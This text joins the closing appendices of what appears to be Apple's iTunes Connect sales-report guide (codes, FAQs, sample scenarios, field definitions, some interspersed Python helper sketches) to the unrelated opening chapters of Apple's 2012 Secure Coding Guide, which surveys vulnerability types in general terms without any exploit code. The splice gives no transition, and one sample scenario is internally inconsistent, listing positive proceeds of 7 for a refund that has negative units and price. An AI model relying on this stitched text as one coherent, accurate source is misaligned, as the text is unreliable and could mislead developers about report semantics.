7 | Updates | iPhone and iPod Touch, iOS
IA1 | In Apps | Purchase, iOS
IA9 | In Apps | Subscription, iOS
IAY | In Apps | Auto-Renewable Subscription, iOS
IAC | In Apps | Free Subscription, iOS
1F | Free or Paid Apps | Universal, iOS
7F | Updates | Universal, iOS
1T | Free or Paid Apps | iPad, iOS
7T | Updates | iPad, iOS
F1 | Free or Paid Apps | Mac OS
F7 | Updates | Mac OS
FI1 | In Apps | Mac OS
1E | Paid Apps | Custom iPhone and iPod Touch, iOS
1EP | Paid Apps | Custom iPad, iOS
1EU | Paid Apps | Custom Universal, iOS

Dashboard Types

Type | Product Type Identifier | Description
Free Apps | 1, 1F, 1T, F1 | Where price = ‘0’
Paid Apps | 1, 1F, 1T, F1 | Where price > ‘0’
In Apps | IA1, IA9, IAY, FI1 |
Updates | 7, 7F, 7T, F7 |

Appendix F – Country Codes

Country Code | Country Name | Country Code | Country Name | Country Code | Country Name
AE | United Arab Emirates | GD | Grenada | NG | Nigeria
AG | Antigua and Barbuda | GH | Ghana | NI | Nicaragua
AI | Anguilla | GR | Greece | NL | Netherlands
AM | Armenia | GT | Guatemala | NO | Norway
AO | Angola | GY | Guyana | NZ | New Zealand
AR | Argentina | HK | Hong Kong | OM | Oman
AT | Austria | HN | Honduras | PA | Panama
AU | Australia | HR | Croatia | PE | Peru
AZ | Azerbaijan | HU | Hungary | PH | Philippines
BB | Barbados | ID | Indonesia | PK | Pakistan
BE | Belgium | IE | Ireland | PL | Poland
BG | Bulgaria | IL | Israel | PT | Portugal
BH | Bahrain | IN | India | PY | Paraguay
BM | Bermuda | IS | Iceland | QA | Qatar
BN | Brunei | IT | Italy | RO | Romania
BO | Bolivia | JM | Jamaica | RU | Russia
BR | Brazil | JO | Jordan | SA | Saudi Arabia
BS | Bahamas | JP | Japan | SE | Sweden
BW | Botswana | KE | Kenya | SG | Singapore
BY | Belarus | KN | St. Kitts and Nevis | SI | Slovenia
BZ | Belize | KR | Republic Of Korea | SK | Slovakia
CA | Canada | KW | Kuwait | SN | Senegal
CH | Switzerland | KY | Cayman Islands | SR | Suriname
CL | Chile | KZ | Kazakhstan | SV | El Salvador
CN | China | LB | Lebanon | TC | Turks and Caicos
CO | Colombia | LC | St. Lucia | TH | Thailand
CR | Costa Rica | LK | Sri Lanka | TN | Tunisia
CY | Cyprus | LT | Lithuania | TR | Turkey
CZ | Czech Republic | LU | Luxembourg | TT | Trinidad and Tobago
DE | Germany | LV | Latvia | TW | Taiwan
DK | Denmark | MD | Republic Of Moldova | TZ | Tanzania
DM | Dominica | MG | Madagascar | UG | Uganda
DO | Dominican Republic | MK | Macedonia | US | United States
DZ | Algeria | ML | Mali | UY | Uruguay
EC | Ecuador | MO | Macau | UZ | Uzbekistan
EE | Estonia | MS | Montserrat | VC | St. Vincent and The Grenadines
EG | Egypt | MT | Malta | VE | Venezuela
ES | Spain | MU | Mauritius | VG | British Virgin Islands
FI | Finland | MX | Mexico | VN | Vietnam
FR | France | MY | Malaysia | YE | Yemen
GB | United Kingdom | NE | Niger | ZA | South Africa

Appendix G – Promotional Codes

The promo code field contains different values depending on the type of promotion. The following definitions describe the possible values that may appear in the field other than null (null means the item is a standard transaction). Only one value is possible per line in the report:

Promo Code | Description
CR - RW | Promotional codes where the proceeds have been waived (the customer price will be 0 and the proceeds will be 0). These transactions are the result of iTunes Connect Developer Code redemptions.
GP | Purchase of a Gift by the giver
GR | Redemption of a Gift by the receiver
EDU | Education Store transaction
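As an illustration of how the Dashboard Types table in Appendix E and the promo codes in Appendix G might be applied to a report row, here is a minimal sketch. The function names and the exact strings stored in the Promo Code field (for example, whether "CR - RW" appears literally) are assumptions, not something this guide specifies. Treating any nonzero price as "Paid Apps", so that refund rows with a negative price are not counted as free, is also an assumption.

```python
# Identifier groups copied from the Dashboard Types table in Appendix E.
FREE_OR_PAID = {"1", "1F", "1T", "F1"}
IN_APPS = {"IA1", "IA9", "IAY", "FI1"}
UPDATES = {"7", "7F", "7T", "F7"}

# Descriptions paraphrased from Appendix G; the key strings are assumed.
PROMO_CODES = {
    "CR - RW": "Promotional code, proceeds waived",
    "GP": "Gift purchase by the giver",
    "GR": "Gift redemption by the receiver",
    "EDU": "Education Store transaction",
}


def dashboard_type(product_type_id: str, customer_price: float) -> str:
    """Map a Product Type Identifier and price to a dashboard type."""
    if product_type_id in FREE_OR_PAID:
        # Assumption: refunds (negative price) count as paid transactions.
        return "Free Apps" if customer_price == 0 else "Paid Apps"
    if product_type_id in IN_APPS:
        return "In Apps"
    if product_type_id in UPDATES:
        return "Updates"
    return "Other"  # e.g. 1E, 1EP, 1EU, which the dashboard table omits


def describe_promo(promo_code: str) -> str:
    """Describe a Promo Code value; blank means a standard transaction."""
    code = (promo_code or "").strip()
    if not code:
        return "Standard transaction"
    return PROMO_CODES.get(code, "Unknown promo code")


if __name__ == "__main__":
    print(dashboard_type("1T", 5.99), "/", describe_promo("GP"))
```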
Appendix H – Currency Codes

Currency Code | Currency Country
AUD | Australian Dollar
CAD | Canadian Dollar
CHF | Swiss Franc
DKK | Danish Kroner
EUR | European Euro
GBP | British Pound
JPY | Japanese Yen
MXN | Mexican Peso
NOK | Norwegian Kroner
NZD | New Zealand Dollar
SEK | Swedish Kronor
USD | United States Dollar

Appendix I - Subscription and Period Field Values

The Subscription field indicates whether the auto-renewable subscription purchase is a new purchase or a renewal.

Subscription Field Value
New
Renewal

The Period field indicates the duration of the auto-renewable subscription purchase or renewal.

Period Field Value
7 Days
1 Month
2 Months
3 Months
6 Months
1 Year

Appendix J - FAQs

What does each column represent in my reports?
Please refer to Appendix A and B.

I am seeing differences between Financial Reports and Sales and Trends reports, why?
The daily and weekly reports are based on customer interaction (clicks) and are coming from real-time systems while the monthly reports are based on settled financial transactions and are coming from our financial systems. There are intentional differences in processing and time-frames between those two types of reports. For example, the weekly reports are from Monday to Sunday, while the Financial Reports are based on the Apple Fiscal Calendar and always end on Saturday. Reconciliation between the reports is not recommended due to the timing and reporting differences.

Do weekly reports reconcile with the daily reports?
Yes.
Both daily and weekly reports come from the same system and are based on customer interaction (clicks). They will reconcile.

I see a high volume of sales for a short period of time (could be up to a week) and then the sales drop down, what does this mean?
It is very common for an item to get a high volume of sales for a short period of time before the numbers return to normal. This is generally due to a particular promotion, such as a blog post or a sales campaign, that includes an item associated with iTunes or the content. There is also a very common case where an item's sales drop to zero. This might indicate that the content is unavailable in iTunes for any of a number of reasons.

I don’t see any sales for a particular item, why?
This can be an indication of an item not being available in the store for different reasons. Check the product availability in iTunes Connect and ensure that the latest contracts are agreed to and in place.

How can I identify refunds?
Sales and Trends reports expose refunds to allow you to monitor refund rate by product. You will see a negative unit value for refund transactions.

Why are there refunds on my reports?
We will provide a refund if the customer experience was in our opinion unsatisfactory (generally quality issues). One thing you can monitor on your reports is the rate of refunds and the content that is refunded, since it is an indication of quality issues with your content.

Appendix K - Sample Sales Report

The following is a sample Sales report to help you interpret its contents. Price fields are dependent on the storefront [1] from which the customer purchases the app, and the price of the app at the time of purchase [2]. (For complete field definitions see Appendix A.)

Reading the Report

The example above is the most likely scenario you will see:
■ SKU – “SKU1” is the SKU attached to this app by the developer.
■ Developer – “Vendor” is the name that the app is sold under on the store
■ Title – “App-1” is the name of the app
■ Product Type Identifier – “1” denotes the type of transaction (initial download)
■ Units – “352” is the number of units sold for a given day/week
■ Developer Proceeds – “3.65” is proceeds, net of commission, you will receive for each sale of the app
■ Customer Currency – “GBP” (Great Britain Pounds) is the currency in which the customer purchased the app
■ Currency of Proceeds – “GBP” (Great Britain Pounds) is the currency in which your proceeds were earned for the app
■ Customer Price – “5.99” is the price paid by the customer for the app

[1] As new territories are added, storefronts will further differentiate records.
[2] If you change your price during the reporting period, the report will show multiple price points for the same country.

Additional Reporting Scenarios

We have provided some additional scenarios and sample extracts to help you further understand your reports. In your reports the Product Type Identifier denotes the type of transaction (see Appendix E for a list of all types). The Product Type Identifier must be taken into account in all of the following scenarios.

Scenario 1 (Product Type Identifier=1; Units=16; Developer Proceeds=4.86)
This is similar to the first line; the Developer Proceeds value will always be greater than zero for all paid apps and zero for free apps.

Scenario 2 (Product Type Identifier=7; Units=1; Developer Proceeds=0)
Certain line items will have 0 in the Developer Proceeds field.
Even if you only have paid apps on the store, the Developer Proceeds will be 0 for all updates (Product Type Identifier = 7).

Scenario 3 (Product Type Identifier=1; Units=-1; Developer Proceeds=7; Customer Price=-9.99)
You may see negative units when a customer returns a product. All returns will have a Product Type Identifier of 1 and both Units and Customer Price will be a negative value. Refer to Appendix J for additional information on returns.

Appendix L – Other Uses

Below are some sample ideas for how the data can be used on a daily basis.

1. Business Health Monitoring
By tracking the volume of sales by units or revenue, you can track the health of your business. A sudden drop in sales may indicate an issue, such as a top seller no longer being available.

2. Content Quality Issues
By tracking refunds, you can identify and replace the asset that is being refunded to the customer if the refunds are specific to one or more items. The typical ratio of refunds to overall sales should not exceed 0.10%.

3. Pricing Issues
As organizations get larger, it is always challenging to maintain fast and efficient communication between the operational teams that provide the metadata to iTunes and the Management, Marketing, Finance and Business Development teams. Tracking pricing will reveal any disconnect between different groups and will provide an opportunity to fix issues sooner and minimize the impact.

4. Price Elasticity
We believe that careful management of price can increase your sales. By using the reports you can monitor the percent change in sales in correlation with a percent change in customer price. If applied correctly, this type of analysis will help you set the best price for your product to maximize your revenue.
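The refund-ratio and price-elasticity ideas above can be sketched as follows. This is an illustrative calculation only: the row layout (a dictionary with a "Units" key), the function names, and the precise definitions (refunded units divided by sold units, and a simple ratio of percent changes) are assumptions chosen for the example, not formulas given in this guide.

```python
# Threshold from Appendix L: refunds should not exceed 0.10% of sales.
REFUND_RATIO_LIMIT = 0.0010


def refund_rate(rows):
    """Return refunded units divided by sold units.

    Assumes each row is a dict with a numeric "Units" value, where
    refunds appear as negative units (see Scenario 3).
    """
    sold = sum(r["Units"] for r in rows if r["Units"] > 0)
    refunded = sum(-r["Units"] for r in rows if r["Units"] < 0)
    return refunded / sold if sold else 0.0


def price_elasticity(units_before, units_after, price_before, price_after):
    """Percent change in units divided by percent change in price."""
    if units_before == 0 or price_before == 0 or price_after == price_before:
        raise ValueError("elasticity is undefined for these inputs")
    pct_units = (units_after - units_before) / units_before
    pct_price = (price_after - price_before) / price_before
    return pct_units / pct_price


if __name__ == "__main__":
    sample = [{"Units": 352}, {"Units": 16}, {"Units": -1}]
    rate = refund_rate(sample)
    print(f"refund rate {rate:.4%}, over limit: {rate > REFUND_RATIO_LIMIT}")
```

An elasticity whose magnitude is below 1 suggests that unit sales change proportionally less than price, which is the kind of signal the Price Elasticity item describes monitoring.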
Appendix M - Newsstand Report Field Definitions

The definitions apply to Newsstand reports.

Report Field | Report Data Type | Values | Notes
Provider | CHAR(5) - APPLE | Up to 5 Characters | The service provider in your reports will typically be Apple
Provider Country | CHAR(2) - US | Up to 2 Characters | The service provider country code will typically be US
SKU | VARCHAR(100) | Up to 100 Characters | This is a product identifier provided by you when the app is set up
Developer | VARCHAR(4000) | Up to 4000 Characters | You provided this on initial setup.
Title | VARCHAR(600) | Up to 600 Characters | You provided this when setting up the app
Version | VARCHAR(100) | Up to 100 Characters | You provided this when setting up the app
Product Type Identifier | VARCHAR(20) | Up to 20 Characters | This field defines the type of transaction (e.g. initial download, update, etc) – See Appendix E
Units | DECIMAL(18,2) | Up to 18 Characters | This is the aggregated number of units
Developer Proceeds (per item) | DECIMAL(18,2) | Up to 18 Characters | Your proceeds for each item delivered
Customer Currency | CHAR(3) | Up to 3 Characters | Three character ISO code indicates the currency the customer paid in - See Appendix H
Country Code | CHAR(2) | Up to 2 Characters | Two character ISO country code indicates what App Store the purchase occurred in – See Appendix F
Currency of Proceeds | CHAR(3) | Up to 3 Characters | Currency your proceeds are earned in – See Appendix H
Apple Identifier | DECIMAL(18,0) | Up to 18 Characters | This is Apple's unique identifier. If you have questions about a product, it is best to include this identifier.
Customer Price | DECIMAL(18,2) | Up to 18 Characters | Retail Price displayed on the App Store and charged to the customer.
Promo Code | VARCHAR(10) | Up to 10 Characters | If the transaction was part of a promotion this field will contain a value. For all non-promotional items this field will be blank - See Appendix G
Parent Identifier | VARCHAR(100) | Up to 100 Characters | For In-App Purchases this will be populated with the SKU from the originating app.
Subscription | VARCHAR(10) | Up to 10 Characters | This field defines whether an auto-renewable subscription purchase is a new purchase or a renewal. See Appendix I.
Period | VARCHAR(30) | Up to 30 Characters | This field defines the duration of an auto-renewable subscription purchase. See Appendix I.
Download Date (PST) | TIMESTAMP(0) | Date in MM/DD/YYYY | Download Date
Customer Identifier | DECIMAL(18,0) | Up to 18 Characters | Customer Identification
Report Date (Local) | DATE | Date in MM/DD/YYYY | Report Date
Sales/Return | CHAR(1) | Up to 1 character | S or R; R is always a refund, R is not a reversal

Secure Coding Guide

Contents

Introduction to Secure Coding Guide 7
    At a Glance 7
    Hackers, Crackers, and Attackers 7
    No Platform Is Immune 8
    How to Use This Document 9
    See Also 10
Types of Security Vulnerabilities 11
    Buffer Overflows 11
    Unvalidated Input 12
    Race Conditions 13
    Interprocess Communication 13
    Insecure File Operations 13
    Access Control Problems 14
    Secure Storage and Encryption 15
    Social Engineering 16
Avoiding Buffer Overflows and Underflows 17
    Stack Overflows 18
    Heap Overflows 20
    String Handling 22
    Calculating Buffer Sizes 25
    Avoiding Integer Overflows and Underflows 27
    Detecting Buffer Overflows 28
    Avoiding Buffer Underflows 29
Validating Input and Interprocess Communication 33
    Risks of Unvalidated Input 33
    Causing a Buffer Overflow 33
    Format String Attacks 34
    URLs and File Handling 36
    Code Insertion 37
    Social Engineering 37
    Modifications to Archived Data 38
    Fuzzing 39
    Interprocess Communication and Networking 40
Race Conditions and Secure File Operations 43
    Avoiding Race Conditions 43
    Time of Check Versus Time of Use 44
    Signal Handling 46
    Securing Signal Handlers 46
    Securing File Operations 47
    Check Result Codes 47
    Watch Out for Hard Links 48
    Watch Out for Symbolic Links 49
    Case-Insensitive File Systems Can Thwart Your Security Model 49
    Create Temporary Files Correctly 50
    Files in Publicly Writable Directories Are Dangerous 51
    Other Tips 57
Elevating Privileges Safely 59
    Circumstances Requiring Elevated Privileges 59
    The Hostile Environment and the Principle of Least Privilege 60
    Launching a New Process 61
    Executing Command-Line Arguments 61
    Inheriting File Descriptors 61
    Abusing Environment Variables 62
    Modifying Process Limits 62
    File Operation Interference 63
    Avoiding Elevated Privileges 63
    Running with Elevated Privileges 63
    Calls to Change Privilege Level 64
    Avoiding Forking Off a Privileged Process 65
    authopen 65
    launchd 66
    Limitations and Risks of Other Mechanisms 67
    Factoring Applications 69
    Example: Preauthorizing 69
    Helper Tool Cautions 71
    Authorization and Trust Policies 72
    Security in a KEXT 72
Designing Secure User Interfaces 73
    Use Secure Defaults 73
    Meet Users’ Expectations for Security 74
    Secure All Interfaces 75
    Place Files in Secure Locations 75
    Make Security Choices Clear 76
    Fight Social Engineering Attacks 78
    Use Security APIs When Possible 79
Designing Secure Helpers and Daemons 81
    Avoid Puppeteering 81
    Use Whitelists 82
    Use Abstract Identifiers and Structures 82
    Use the Smell Test 83
    Treat Both App and Helper as Hostile 83
    Run Daemons as Unique Users 84
    Start Other Processes Safely 84
Security Development Checklists 86
    Use of Privilege 86
    Data, Configuration, and Temporary Files 88
    Network Port Use 89
    Audit Logs 91
    Client-Server Authentication 93
    Integer and Buffer Overflows 97
    Cryptographic Function Use 97
    Installation and Loading 98
    Use of External Tools and Libraries 100
    Kernel Security 101
Third-Party Software Security Guidelines 103
    Respect Users’ Privacy 103
    Provide Upgrade Information 103
    Store Information in Appropriate Places 103
    Avoid Requiring Elevated Privileges 104
    Implement Secure Development Practices 104
    Test for Security 104
    Helpful Resources 105
Document Revision History 106
Glossary 107
Index 110

Figures, Tables, and Listings

Avoiding Buffer Overflows and Underflows 17
    Figure 2-1 Schematic view of the stack 19
    Figure 2-2 Stack after malicious buffer overflow 20
    Figure 2-3 Heap overflow 21
    Figure 2-4 C string handling functions and buffer overflows 22
    Figure 2-5 Buffer overflow crash log 29
    Table 2-1 String functions to use and avoid 23
    Table 2-2 Avoid hard-coded buffer sizes 25
    Table 2-3 Avoid unsafe concatenation 26
Race Conditions and Secure File Operations 43
    Table 4-1 C file functions to avoid and to use 55
Elevating Privileges Safely 59
    Listing 5-1 Non-privileged process 70
    Listing 5-2 Privileged process 71

2012-06-11 | © 2012 Apple Inc. All Rights Reserved.
Introduction to Secure Coding Guide

Secure coding is the practice of writing programs that are resistant to attack by malicious or mischievous people or programs. Secure coding helps protect a user’s data from theft or corruption. In addition, an insecure program can provide access for an attacker to take control of a server or a user’s computer, resulting in anything from a denial of service to a single user to the compromise of secrets, loss of service, or damage to the systems of thousands of users.

Secure coding is important for all software; if you write any code that runs on Macintosh computers or on iOS devices, from scripts for your own use to commercial software applications, you should be familiar with the information in this document.

At a Glance

Every program is a potential target. Attackers will try to find security vulnerabilities in your applications or servers. They will then try to use these vulnerabilities to steal secrets, corrupt programs and data, and gain control of computer systems and networks. Your customers’ property and your reputation are at stake.

Security is not something that can be added to software as an afterthought; just as a shed made out of cardboard cannot be made secure by adding a padlock to the door, an insecure tool or application may require extensive redesign to secure it. You must identify the nature of the threats to your software and incorporate secure coding practices throughout the planning and development of your product. This chapter explains the types of threats that your software may face. Other chapters in this document describe specific types of vulnerabilities and give guidance on how to avoid them.

Hackers, Crackers, and Attackers

Contrary to the usage by most news media, within the computer industry the term hacker refers to an expert programmer, one who enjoys learning about the intricacies of code or an operating system. In general, hackers are not malicious.
When most hackers find security vulnerabilities in code, they inform the company or organization that’s responsible for the code so that it can fix the problem. Some hackers, especially if they feel their warnings are being ignored, publish the vulnerabilities or even devise and publish exploits (code that takes advantage of the vulnerability).

The malicious individuals who break into programs and systems in order to do damage or to steal something are referred to as crackers, attackers, or black hats. Most attackers are not highly skilled, but take advantage of published exploit code and known techniques to do their damage. People (usually, though not always, young men) who use published code (scripts) to attack software and computer systems are sometimes called script kiddies.

Attackers may be motivated by a desire to steal money, identities, and other secrets for personal gain; corporate secrets for their employer’s or their own use; or state secrets for use by hostile governments or terrorist organizations. Some crackers break into applications or operating systems just to show that they can do it; nevertheless, they can cause considerable damage. Because attacks can be automated and replicated, any weakness, no matter how slight, can be exploited.

The large number of insiders who are attacking systems is of importance to security design because, whereas malicious hackers and script kiddies are most likely to rely on remote access to computers to do their dirty work, insiders might have physical access to the computer being attacked. Your software must be resistant to both attacks over a network and attacks by people sitting at the computer keyboard; you cannot rely on firewalls and server passwords to protect you.

No Platform Is Immune

So far, OS X has not fallen prey to any major, automated attack like the MyDoom virus. There are several reasons for this.
One is that OS X is based on open source software such as BSD; many hackers have searched this software over the years looking for security vulnerabilities, so that not many vulnerabilities remain. Another is that OS X turns off all routable networking services by default. Also, the email and internet clients used most commonly on OS X do not have privileged access to the operating system and are less vulnerable to attack than those used on some other common operating systems. Finally, Apple actively reviews the operating system and applications for security vulnerabilities, and issues downloadable security updates frequently.

iOS is based on OS X and shares many of its security characteristics. In addition, it is inherently more secure than even OS X because each application is restricted in the files and system resources it can access. Beginning in version 10.7, Mac apps can opt into similar protection.

That’s the good news. The bad news is that applications and operating systems are constantly under attack. Every day, black hat hackers discover new vulnerabilities and publish exploit code. Criminals and script kiddies then use that exploit code to attack vulnerable systems. Also, security researchers have found many vulnerabilities on a variety of systems that, if exploited, could have resulted in loss of data, allowed an attacker to steal secrets, or enabled an attacker to run code on someone else’s computer.

A large-scale, widespread attack is not needed to cause monetary and other damages; a single break-in is sufficient if the system broken into contains valuable information. Although major attacks of viruses or worms get a lot of attention from the media, the destruction or compromising of data on a single computer is what matters to the average user.
For your users’ sake, you should take every security vulnerability seriously and work to correct known problems quickly. If every Macintosh and iOS developer follows the advice in this document and other books on electronic security, and if the owner of each Macintosh takes common-sense precautions such as using strong passwords and encrypting sensitive data, then OS X and iOS will maintain their reputations for being safe, reliable operating systems, and your company’s products will benefit from being associated with OS X or iOS.

How to Use This Document

This document assumes that you have already read Security Overview.

The document begins with “Types of Security Vulnerabilities” (page 11), which gives a brief introduction to the nature of each of the types of security vulnerability commonly found in software. This chapter provides background information that you should understand before reading the other chapters in the document. If you’re not sure what a race condition is, for example, or why it poses a security risk, this chapter is the place to start.

The remaining chapters in the document discuss specific types of security vulnerabilities in some detail. These chapters can be read in any order, or as suggested by the software development checklist in “Security Development Checklists” (page 86).
● “Avoiding Buffer Overflows And Underflows” (page 17) describes the various types of buffer overflows and explains how to avoid them.
● “Validating Input And Interprocess Communication” (page 33) discusses why and how you must validate every type of input your program receives from untrusted sources.
● “Race Conditions and Secure File Operations” (page 43) explains how race conditions occur, discusses ways to avoid them, and describes insecure and secure file operations.
● “Elevating Privileges Safely” (page 59) describes how to avoid running code with elevated privileges and what to do if you can’t avoid it entirely.
● “Designing Secure User Interfaces” (page 73) discusses how the user interface of a program can enhance or compromise security and gives some guidance on how to write a security-enhancing UI.
● “Designing Secure Helpers And Daemons” (page 81) describes how to design helper applications in ways that are conducive to privilege separation.

In addition, the appendix “Security Development Checklists” (page 86) provides a convenient list of tasks that you should perform before shipping an application, and the appendix “Third-Party Software Security Guidelines” (page 103) provides a list of guidelines for third-party applications bundled with OS X.

See Also

This document concentrates on security vulnerabilities and programming practices of special interest to developers using OS X or iOS. For discussions of secure programming of interest to all programmers, see the following books and documents:
● See Viega and McGraw, Building Secure Software, Addison Wesley, 2002, for a general discussion of secure programming, especially as it relates to C programming and writing scripts.
● See Wheeler, Secure Programming for Linux and Unix HOWTO, available at http://www.dwheeler.com/secureprograms/, for discussions of several types of security vulnerabilities and programming tips for UNIX-based operating systems, most of which apply to OS X.
● See Cranor and Garfinkel, Security and Usability: Designing Secure Systems that People Can Use, O’Reilly, 2005, for information on writing user interfaces that enhance security.

For documentation of security-related application programming interfaces (APIs) for OS X (and iOS, where noted), see the following Apple documents:
● For an introduction to some security concepts and to learn about the security features available in OS X, see Security Overview.
● For information on secure networking, see Cryptographic Services Guide, Secure Transport Reference, and CFNetwork Programming Guide.
● For information on OS X authorization and authentication APIs, see Authentication, Authorization, and Permissions Guide, Authorization Services Programming Guide, Authorization Services C Reference, and Security Foundation Framework Reference.
● If you are using digital certificates for authentication, see Cryptographic Services Guide, Certificate, Key, and Trust Services Reference (iOS version available), and Certificate, Key, and Trust Services Programming Guide.
● For secure storage of passwords and other secrets, see Cryptographic Services Guide, Keychain Services Reference (iOS version available), and Keychain Services Programming Guide.

For information about security in web application design, visit http://www.owasp.org/.

Types of Security Vulnerabilities

Most software security vulnerabilities fall into one of a small set of categories:
● buffer overflows
● unvalidated input
● race conditions
● access-control problems
● weaknesses in authentication, authorization, or cryptographic practices

This chapter describes the nature of each type of vulnerability.

Buffer Overflows

A buffer overflow occurs when an application attempts to write data past the end (or, occasionally, past the beginning) of a buffer. Buffer overflows can cause applications to crash, can compromise data, and can provide an attack vector for further privilege escalation to compromise the system on which the application is running.

Books on software security invariably mention buffer overflows as a major source of vulnerabilities. Exact numbers are hard to come by, but as an indication, approximately 20% of the published exploits reported by the United States Computer Emergency Readiness Team (US-CERT) for 2004 involved buffer overflows.
Any application or system software that takes input from the user, from a file, or from the network has to store that input, at least temporarily. Except in special cases, most application memory is stored in one of two places:
● stack: A part of an application’s address space that stores data that is specific to a single call to a particular function, method, block, or other equivalent construct.
● heap: General purpose storage for an application. Data stored in the heap remains available as long as the application is running (or until the application explicitly tells the operating system that it no longer needs that data). Class instances, data allocated with malloc, Core Foundation objects, and most other application data reside on the heap. (Note, however, that the local variables that actually point to the data are stored in the stack.)

Buffer overflow attacks generally occur by compromising either the stack, the heap, or both. For more information, read “Avoiding Buffer Overflows And Underflows” (page 17).

Unvalidated Input

As a general rule, you should check all input received by your program to make sure that the data is reasonable. For example, a graphics file can reasonably contain an image that is 200 by 300 pixels, but cannot reasonably contain an image that is 200 by -1 pixels. Nothing prevents a file from claiming to contain such an image, however (apart from convention and common sense). A naive program attempting to read such a file would attempt to allocate a buffer of an incorrect size, leading to the potential for a heap overflow attack or other problem. For this reason, you must check your input data carefully. This process is commonly known as input validation or sanity checking.

Any input received by your program from an untrusted source is a potential target for attack. (In this context, an ordinary user is an untrusted source.)
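The image-dimension example above can be turned into a small validation sketch. It is illustrative only: the function name, the `MAX_DIMENSION` bound, and the default of 4 bytes per pixel are assumptions picked for the example, and a real parser would take its limits from the file format it reads.

```python
# Hypothetical upper bound on either dimension; choose a limit that
# suits the file format and the memory available to your program.
MAX_DIMENSION = 16384


def checked_pixel_buffer_size(width, height, bytes_per_pixel=4):
    """Validate header-supplied dimensions before sizing a buffer.

    Raises ValueError for values that a well-formed image cannot have,
    such as a height of -1, instead of passing them to an allocator.
    """
    for name, value in (("width", width), ("height", height)):
        # Reject non-integers (and booleans, which are ints in Python).
        if not isinstance(value, int) or isinstance(value, bool):
            raise ValueError(f"{name} must be an integer")
        if not 1 <= value <= MAX_DIMENSION:
            raise ValueError(f"{name} {value} is outside 1..{MAX_DIMENSION}")
    return width * height * bytes_per_pixel


if __name__ == "__main__":
    print(checked_pixel_buffer_size(200, 300))
    try:
        checked_pixel_buffer_size(200, -1)
    except ValueError as error:
        print("rejected:", error)
```

In a language with fixed-width integers, such as C, the multiplication itself would also need an overflow check; Python's arbitrary-precision integers hide that step here.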
Examples of input from an untrusted source include (but are not restricted to):

● text input fields
● commands passed through a URL used to launch the program
● audio, video, or graphics files provided by users or other processes and read by the program
● command line input
● any data read from an untrusted server over a network
● any untrusted data read from a trusted server over a network (user-submitted HTML or photos on a bulletin board, for example)

Hackers look at every source of input to the program and attempt to pass in malformed data of every type they can imagine. If the program crashes or otherwise misbehaves, the hacker then tries to find a way to exploit the problem. Unvalidated-input exploits have been used to take control of operating systems, steal data, corrupt users’ disks, and more. One such exploit was even used to “jailbreak” iPhones.

“Validating Input And Interprocess Communication” (page 33) describes common types of input-validation vulnerabilities and what to do about them.

Race Conditions

A race condition exists when changes to the order of two or more events can cause a change in behavior. If the correct order of execution is required for the proper functioning of the program, this is a bug. If an attacker can take advantage of the situation to insert malicious code, change a filename, or otherwise interfere with the normal operation of the program, the race condition is a security vulnerability. Attackers can sometimes take advantage of small time gaps in the processing of code to interfere with the sequence of operations, which they then exploit.

For more information about race conditions and how to prevent them, read “Race Conditions and Secure File Operations” (page 43).

Interprocess Communication

Separate processes (either within a single program or in two different programs) sometimes have to share information.
Common methods include using shared memory or using some messaging protocol, such as sockets, provided by the operating system. These messaging protocols used for interprocess communication are often vulnerable to attack; thus, when writing an application, you must always assume that the process at the other end of your communication channel could be hostile.

For more information on how to perform secure interprocess communication, read “Validating Input And Interprocess Communication” (page 33).

Insecure File Operations

In addition to time-of-check–time-of-use problems, many other file operations are insecure. Programmers often make assumptions about the ownership, location, or attributes of a file that might not be true. For example, you might assume that you can always write to a file created by your program. However, if an attacker can change the permissions or flags on that file after you create it, and if you fail to check the result code after a write operation, you will not detect the fact that the file has been tampered with.

Examples of insecure file operations include:

● writing to or reading from a file in a location writable by another user
● failing to make the right checks for file type, device ID, links, and other settings before using a file
● failing to check the result code after a file operation
● assuming that if a file has a local pathname, it has to be a local file

These and other insecure file operations are discussed in more detail in “Securing File Operations” (page 47).

Access Control Problems

Access control is the process of controlling who is allowed to do what. This ranges from controlling physical access to a computer (keeping your servers in a locked room, for example) to specifying who has access to a resource (a file, for example) and what they are allowed to do with that resource (such as read only).
Some access control mechanisms are enforced by the operating system, some by the individual application or server, and some by a service (such as a networking protocol) in use. Many security vulnerabilities are created by the careless or improper use of access controls, or by the failure to use them at all.

Much of the discussion of security vulnerabilities in the software security literature is in terms of privileges, and many exploits involve an attacker somehow gaining more privileges than they should have. Privileges, also called permissions, are access rights granted by the operating system, controlling who is allowed to read and write files, directories, and attributes of files and directories (such as the permissions for a file), who can execute a program, and who can perform other restricted operations such as accessing hardware devices and making changes to the network configuration. File permissions and access control in OS X are discussed in File System Programming Guide.

Of particular interest to attackers is the gaining of root privileges, which refers to having the unrestricted permission to perform any operation on the system. An application running with root privileges can access everything and change anything. Many security vulnerabilities involve programming errors that allow an attacker to obtain root privileges. Some such exploits involve taking advantage of buffer overflows or race conditions, which in some special circumstances allow an attacker to escalate their privileges. Others involve having access to system files that should be restricted or finding a weakness in a program (such as an application installer) that is already running with root privileges. For this reason, it’s important to always run programs with as few privileges as possible. Similarly, when it is necessary to run a program with elevated privileges, you should do so for as short a time as possible.
Much access control is enforced by applications, which can require a user to authenticate before granting authorization to perform an operation. Authentication can involve requesting a user name and password, the use of a smart card, a biometric scan, or some other method. If an application calls the OS X Authorization Services application interface to authenticate a user, it can automatically take advantage of whichever authentication method is available on the user’s system. Writing your own authentication code is a less secure alternative, as it might afford an attacker the opportunity to take advantage of bugs in your code to bypass your authentication mechanism, or it might offer a less secure authentication method than the standard one used on the system. Authorization and authentication are described further in Security Overview.

Digital certificates are commonly used, especially over the Internet and with email, to authenticate users and servers, to encrypt communications, and to digitally sign data to ensure that it has not been corrupted and was truly created by the entity that the user believes to have created it. Incorrect or careless use of digital certificates can lead to security vulnerabilities. For example, a server administration program shipped with a standard self-signed certificate, with the intention that the system administrator would replace it with a unique certificate. However, many system administrators failed to take this step, with the result that an attacker could decrypt communication with the server. [CVE-2004-0927]

It’s worth noting that nearly all access controls can be overcome by an attacker who has physical access to a machine and plenty of time.
For example, no matter what you set a file’s permissions to, the operating system cannot prevent someone from bypassing the operating system and reading the data directly off the disk. Only restricting access to the machine itself and the use of robust encryption techniques can protect data from being read or corrupted under all circumstances.

The use of access controls in your program is discussed in more detail in “Elevating Privileges Safely” (page 59).

Secure Storage and Encryption

Encryption can be used to protect a user’s secrets from others, either during data transmission or when the data is stored. (The problem of how to protect a vendor’s data from being copied or used without permission is not addressed here.)

OS X provides a variety of encryption-based security options, such as:

● FileVault
● the ability to create encrypted disk images
● keychain
